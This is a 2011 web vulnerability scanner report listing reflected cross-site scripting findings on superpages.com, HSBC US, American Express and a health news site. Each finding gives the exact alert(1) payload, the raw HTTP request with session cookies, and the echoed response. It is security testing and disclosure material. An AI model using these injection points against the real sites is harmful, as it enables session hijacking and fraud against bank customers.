<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <title>Ally Bank - Handlin ...[SNIP]... = 'http://www.superpages.com'; var searchtype="two"; searchtype="two"; var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1f71cf"-alert(1)-"8b1ed61181f&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1"; var client_id = "133515049997773"; var redirecturl = 'http://www.superpages.com/bp/Facebook?prev=yp_profile'; //--> ...[SNIP]...
1.522. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7992e"-alert(1)-"47024e3844d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1&7992e"-alert(1)-"47024e3844d=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750649070-www.superpages.com-20879668-932317; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:30:49 GMT; Path=/ Set-Cookie: JSESSIONID=3B2D663DFEFD640AA8C05C35E7490265; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:30:48 GMT Content-Length: 23390
<!-- --> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <title> Superpages.com ...[SNIP]... pe="two"; var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1&7992e"-alert(1)-"47024e3844d=1"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f53dc"-alert(1)-"b9a871a93d9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/xmlproxyf53dc"-alert(1)-"b9a871a93d9?url=http%3A%2F%2Fugc-int.superpages.com%2Fugcwiki%2FGetPhotoServlet%3FlistingId%3D2118363360 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_cc=true; s_lastvisit=1296748870245; s_pv=Business%20Profile; s_dfa=superpagescom; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: web=; Domain=.superpages.com; Path=/ Set-Cookie: shopping=; Domain=.superpages.com; Path=/ Set-Cookie: yp=; Domain=.superpages.com; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:03:55 GMT Content-Length: 57628
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <script language="JavaScript" type="text/javascript"> document.cookie="OpenPhones="; </script> <h ...[SNIP]... ellowpages.superpages.com'; var var_account = 'Superpagescom'; var hostServ = 'http://www.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://www.superpages.com/bp/xmlproxyf53dc"-alert(1)-"b9a871a93d9?url=http%3A%2F%2Fugc-int.superpages.com%2Fugcwiki%2FGetPhotoServlet%3FlistingId%3D2118363360"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
1.524. http://www.superpages.com/coupons [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.superpages.com
Path:
/coupons
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3b22"-alert(1)-"6172bed7d5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /coupons?f3b22"-alert(1)-"6172bed7d5b=1 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: JSESSIONID=14A03C36B158EBE2AE84FEB1EA46C2E7; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 74692 Date: Thu, 03 Feb 2011 17:09:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="h ...[SNIP]... //yellowpages.superpages.com'; var var_account = 'Superpagescom'; var hostServ = 'http://www.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://www.superpages.com/coupons?f3b22"-alert(1)-"6172bed7d5b=1"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54e04"-alert(1)-"5dda26f052b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inc/social/54e04"-alert(1)-"5dda26f052b?n=5&t=Ally+Bank+in+Philadelphia%2C+PA+%7C+P+O+Box+13625%2C+Philadelphia%2C+PA&u=http://yellowpages.superpages.com%2Fbp%2FUS%2FAlly-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm%3FSRC%3Dcomlocal1a%26lbp%3D1%26PGID%3Ddalms102.8089.1296748577335.307646855%26bidType%3DCLIK%26TR%3D1&s=1 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
...[SNIP]... var hostServ = 'http://www.superpages.com'; var searchtype="two";
searchtype="one";
var actualUrl = "http://www.superpages.com/inc/social/54e04"-alert(1)-"5dda26f052b?n=5&t=Ally+Bank+in+Philadelphia%2C+PA+%7C+P+O+Box+13625%2C+Philadelphia%2C+PA&u=http://yellowpages.superpages.com%2Fbp%2FUS%2FAlly-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm%3FSRC%3Dcomloc ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43ba5"><img%20src%3da%20onerror%3dalert(1)>935e0c29137 was submitted in the REST URL parameter 2. This input was echoed as 43ba5"><img src=a onerror=alert(1)>935e0c29137 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /yellowpages/C-Banks43ba5"><img%20src%3da%20onerror%3dalert(1)>935e0c29137 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:07:36 GMT Server: Unspecified Vary: Host Last-Modified: Thu, 03 Feb 2011 17:07:36GMT Content-Length: 59492 Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:36 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <META NAME="TITLE" CONTENT="Banks43ba5"><img Src=a Onerror=alert(1)>935e0c29137 in Yellow Pages by SuperPages"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4500c<img%20src%3da%20onerror%3dalert(1)>46b2d68491a was submitted in the REST URL parameter 2. This input was echoed as 4500c<img src=a onerror=alert(1)>46b2d68491a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /yellowpages/C-Banks4500c<img%20src%3da%20onerror%3dalert(1)>46b2d68491a HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:07:45 GMT Server: Unspecified Vary: Host Last-Modified: Thu, 03 Feb 2011 17:07:46GMT Content-Length: 58480 Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:46 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <META NAME="TITLE" CONTENT="Banks4500c<img Src=a Onerror=alert(1)>46b2d68491a in Y ...[SNIP]... <h1>Select a State to view Banks4500c<img Src=a Onerror=alert(1)>46b2d68491a Listings </h1> ...[SNIP]...
1.528. http://www.superpages.com/yellowpages/C-Banks [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.superpages.com
Path:
/yellowpages/C-Banks
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bf72b<img%20src%3da%20onerror%3dalert(1)>ee7e8ccc6d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf72b<img src=a onerror=alert(1)>ee7e8ccc6d1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /yellowpages/C-Banks?bf72b<img%20src%3da%20onerror%3dalert(1)>ee7e8ccc6d1=1 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:07:06 GMT Server: Unspecified Vary: Host Last-Modified: Thu, 03 Feb 2011 17:07:06GMT Content-Length: 59798 Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:06 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <META NAME="TITLE" CONTENT="Banks?bf72b<img Src=a Onerror=alert(1)>ee7e8ccc6d1=1 i ...[SNIP]... <h1>Select a State to view Banks?bf72b<img Src=a Onerror=alert(1)>ee7e8ccc6d1=1 Listings </h1> ...[SNIP]...
1.529. http://www.superpages.com/yellowpages/C-Banks [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.superpages.com
Path:
/yellowpages/C-Banks
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41c54"><img%20src%3da%20onerror%3dalert(1)>2bfa6c73542 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 41c54"><img src=a onerror=alert(1)>2bfa6c73542 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /yellowpages/C-Banks?41c54"><img%20src%3da%20onerror%3dalert(1)>2bfa6c73542=1 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:06:55 GMT Server: Unspecified Vary: Host Last-Modified: Thu, 03 Feb 2011 17:06:56GMT Content-Length: 60810 Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:21:56 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <META NAME="TITLE" CONTENT="Banks?41c54"><img Src=a Onerror=alert(1)>2bfa6c73542=1 in Yellow Pages by SuperPages"> ...[SNIP]...
The value of the sub request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e765"><script>alert(1)</script>4ba170077e5 was submitted in the sub parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ac-usap.php?sub=xyp7e765"><script>alert(1)</script>4ba170077e5 HTTP/1.1 Host: www.thehealthreport.net Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.pp&pos=7&t=7&sz=310x101&ord=1296748883062&k=banks&l=Dallas%2c+TX Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"> <!-- saved from url=(0034)http://www.channel5healthnews.net/ --> <H ...[SNIP]... <A href="http://ziggymedia.go2cloud.org/aff_c?offer_id=6&aff_id=1001&source=xyp7e765"><script>alert(1)</script>4ba170077e5-dp" target=_blank> ...[SNIP]...
The value of the hp_pref request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74bf5"%3balert(1)//00c0d1ff9 was submitted in the hp_pref parameter. This input was echoed as 74bf5";alert(1)//00c0d1ff9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /1/2/3?command=makeThisMyHome&hp_pref=r74bf5"%3balert(1)//00c0d1ff9 HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:09:06 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:10:07 GMT Vary: User-Agent,Cookie Content-Length: 5895 Set-Cookie: USIB2G=00005EK9jF4bpOMzFrUSkh3Dd5x:14k1jbteq; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http-equiv="Content-Type" content=" ...[SNIP]... <script language="javascript"> var date = new Date(); date.setTime(date.getTime()+(365*24*60*60*1000)); var expires = "; expires="+date.toGMTString(); document.cookie = "hp_pref"+"="+"r74bf5";alert(1)//00c0d1ff9"+expires+"; path=/";
The value of the code request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afe63"style%3d"x%3aexpression(alert(1))"19a95eb25d7 was submitted in the code parameter. This input was echoed as afe63"style="x:expression(alert(1))"19a95eb25d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /1/2/3/hsbcpremier/apply?code=MEP0002714afe63"style%3d"x%3aexpression(alert(1))"19a95eb25d7 HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:39 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:39 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000Dhol7ilZ0q0aTb173umEJKd:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:38 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 34486
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of the code request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7758e"%3balert(1)//c523249deae was submitted in the code parameter. This input was echoed as 7758e";alert(1)//c523249deae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /1/2/3/hsbcpremier/prom/jan-11?code=CSM00016997758e"%3balert(1)//c523249deae&WT.ac=HBUS_CSM0001699 HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:11 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:11 GMT Vary: User-Agent,Cookie Content-Length: 26880 Set-Cookie: USIB2G=0000JbZ447P9hCR84of1XRxrbLB:14k1jbteq; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
The value of the code request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eae3f'%3balert(1)//f4fc58b391e was submitted in the code parameter. This input was echoed as eae3f';alert(1)//f4fc58b391e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /1/2/3/hsbcpremier/prom/jan-11?code=CSM0001699eae3f'%3balert(1)//f4fc58b391e&WT.ac=HBUS_CSM0001699 HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:12 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:12 GMT Vary: User-Agent,Cookie Content-Length: 26880 Set-Cookie: USIB2G=0000bKlIRzRrrCPXuxZazS0H-Ki:14k1jbteq; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
The value of the code request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41ec8"style%3d"x%3aexpression(alert(1))"fd17a07d03f was submitted in the code parameter. This input was echoed as 41ec8"style="x:expression(alert(1))"fd17a07d03f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /1/2/3/hsbcpremier/prom/jan-11?code=CSM000169941ec8"style%3d"x%3aexpression(alert(1))"fd17a07d03f&WT.ac=HBUS_CSM0001699 HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:10 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:10 GMT Vary: User-Agent,Cookie Content-Length: 27260 Set-Cookie: USIB2G=0000NYkxlYtKgvFgWjsyZ7uTMLY:14k1jbteq; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
The value of the inav request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52396"%3balert(1)//a663c189a2b was submitted in the inav parameter. This input was echoed as 52396";alert(1)//a663c189a2b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-credit-cards/?inav=footer_small_business_credit_cards52396"%3balert(1)//a663c189a2b HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:15:24 GMT Server: IBM_HTTP_Server Set-Cookie: homepage=a;Expires=Thu, 10-Feb-2011 14:15:24 GMT Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 71911
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
